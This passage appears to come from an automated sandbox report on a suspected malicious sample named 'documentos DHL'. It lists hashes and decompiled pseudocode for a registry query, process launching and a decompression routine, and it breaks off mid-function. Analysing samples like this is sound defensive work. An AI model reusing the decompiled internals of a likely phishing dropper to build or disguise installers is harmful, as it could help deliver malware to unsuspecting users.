Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 7f0b268359981ce96b8471a5d3c832aa899a6e6df9d4a1bd192212e4a6da3699
Instruction ID: e7a51b5005e981c4ca122d20ba3fe12824fd99f760bfe42b36e815d14bf77052
Opcode Fuzzy Hash: 7f0b268359981ce96b8471a5d3c832aa899a6e6df9d4a1bd192212e4a6da3699
Instruction Fuzzy Hash: 5C01717120060DABDF209F11DD84AAB3735EB84395F204037FE457A1D1C7BA8D92AF69

Uniqueness

Uniqueness Score: -1.00%

Function 0040627E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040627E(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t21 = E0040621D(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8); // executed
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}

0x0040628c
0x0040628e
0x004062a6
0x004062ab
0x004062b0
0x004062ee
0x004062ee
0x004062b2
0x004062c4
0x004062cf
0x004062d5
0x004062e0
0x00000000
0x00000000
0x004062e0
0x004062f4

APIs

RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,00422708,00000000,?,?,Call,?,?,004064F2,80000002), ref: 004062C4
RegCloseKey.ADVAPI32(?,?,004064F2,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,00422708), ref: 004062CF

Strings

Call, xrefs: 00406285

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
Instruction ID: c3e7de0656b9710826ab6423f517e97bb9b3954c36c3ca231a2eb326ebdf078d
Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
Instruction Fuzzy Hash: 80019A32500209EADF219F90CC09EDB3BA8EF55360F01803AFD16A21A0D738DA64DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00405995 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405995(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x426730->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426730,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x0040599e
0x004059be
0x004059c6
0x004059cb
0x00000000
0x004059d1
0x004059d5

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059BE
CloseHandle.KERNEL32(?), ref: 004059CB

Strings

Error launching installer, xrefs: 004059A8

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
Instruction ID: 7702c274cdf70951028335e9b96fa9876c0cc9a795fc840707e03dbfe60e7272
Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
Instruction Fuzzy Hash: B4E046F0A00209BFEB009BA4ED09F7BBAACFB04208F418431BD00F6190D774A8208A78

Uniqueness

Uniqueness Score: -1.00%

Function 00406EEF Relevance: 5.2, APIs: 4, Instructions: 236
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E00406EEF() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M0040735D))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
